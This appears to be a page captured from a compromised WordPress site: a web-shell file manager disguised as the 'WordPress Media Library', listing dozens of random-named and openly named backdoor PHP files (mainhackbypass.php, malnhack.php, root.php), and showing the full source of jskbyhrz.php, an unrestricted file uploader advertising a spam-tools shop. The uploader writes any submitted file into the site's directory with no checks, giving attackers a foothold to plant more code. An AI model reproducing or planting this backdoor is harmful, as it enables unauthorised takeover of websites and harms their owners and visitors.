⚙ WordPress Media Library
File manager
📁 Media Files
📋 .htaccess
📋 .metadata
🔧 4005.php
🔧 about.php
🔧 bypassserv.php
🔧 edit-tags.php
🔧 eeveqowv.php
🔧 f350.php
🔧 ffroodtj.php
🔧 hdtzoepj.php
🔧 htmhytpn.php
🔧 ijnkwkfj.php
📋 images
🔧 index.php
🔧 inputs.php
🔧 install.php
🔧 jkdeeziz.php
🔧 jppfnovy.php
🔧 jskbyhrz.php
🔧 krdkjydm.php
📄 license.txt
🔧 lixgaldk.php
🔧 llzvlwze.php
🔧 mah.php
🔧 mainhackbypass.php
🔧 malnhack.php
🔧 mrlxxapf.php
🔧 njofsdtx.php
🔧 ntekbfld.php
🔧 ogorydam.php
📋 php.ini
🔧 postnews.php
🌐 readme.html
📄 robots.txt
🔧 root.php
🔧 rrvlfxop.php
🔧 sm.php
🔧 uadyesrt.php
🔧 whbziyxp.php
🔧 wnluxuft.php
🔧 wordfence-waf.php
🔧 wp-activate.php
📋 wp-admin
🔧 wp-blog-header.php
🔧 wp-comments-post.php
🔧 wp-config-sample.php
🔧 wp-config.php
📋 wp-content
🔧 wp-cron.php
📋 wp-includes
🔧 wp-links-opml.php
🔧 wp-load.php
🔧 wp-login.php
🔧 wp-mail.php
🔧 wp-settings.php
🔧 wp-signup.php
🔧 wp-trackback.php
🔧 xhfxrzih.php
🔧 xmlrpc.php
🔧 xyaqmwvg.php
🔧 yrelxoai.php
⬆️ Upload Media
Upload File
📝 Edit: jskbyhrz.php
Size: 3.02 KB | Modified: 2025-12-02 18:27:01
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Personal File Uploader</title> <meta name="generator" content="sellex" /> <meta name="author" content="sellex" /> <meta name="description" content="[ sellex ]" /> <style> body { background: #000000 url(https://wallpaperaccess.com/full/1556608.jpg) scroll repeat center center; color: silver; font-family: Comic Sans MS; font-size: 14px; font-weight: bold } #black{ text-align: center; font-size:14px; font-weight: bold; } a:link, a:visited {font-weight:normal; text-decoration:none; color:silver;} a:hover {font-weight:bold; text-decoration:none; cursor:default;} </style> </head> <body> <?php $myUpload = new maxUpload(); //$myUpload->setUploadLocation(getcwd().DIRECTORY_SEPARATOR); $myUpload->uploadFile(); ?> <?php class maxUpload{ var $uploadLocation; function maxUpload(){ $this->uploadLocation = getcwd().DIRECTORY_SEPARATOR; } function setUploadLocation($dir){ $this->uploadLocation = $dir; } function showUploadForm($msg='',$error=''){ ?> <div id="container"> <center><b>Spam Tools shop</b></center><br/> <center><b>https://sellex.pw/</b></center><br/> <?php if ($msg != ''){ echo '<p class="msg">'.$msg.'</p>'; } else if ($error != ''){ echo '<p class="emsg">'.$error.'</p>'; } ?> <form action="" method="post" enctype="multipart/form-data" > <center> <label><b>File: </b> <input name="myfile" type="file" size="30" /> </label> <label> <input type="submit" name="submitBtn" class="sbtn" value="Upload" /> </label> </center> </form> </div> <?php } function uploadFile(){ if (!isset($_POST['submitBtn'])){ $this->showUploadForm(); } else { $msg = ''; $error = ''; //Check destination directory if (!file_exists($this->uploadLocation)){ $error = "The target directory doesn't exists!"; } else if (!is_writeable($this->uploadLocation)) { $error = "The target directory is not writeable!"; } else { $target_path = $this->uploadLocation . basename( $_FILES['myfile']['name']); if(@move_uploaded_file($_FILES['myfile']['tmp_name'], $target_path)) { $msg = basename( $_FILES['myfile']['name']). " was uploaded successfully!"; } else{ $error = "The upload process failed!"; } } $this->showUploadForm($msg,$error); } } } ?> </body>
💾 Save Changes
📥 Download
🗑️ Delete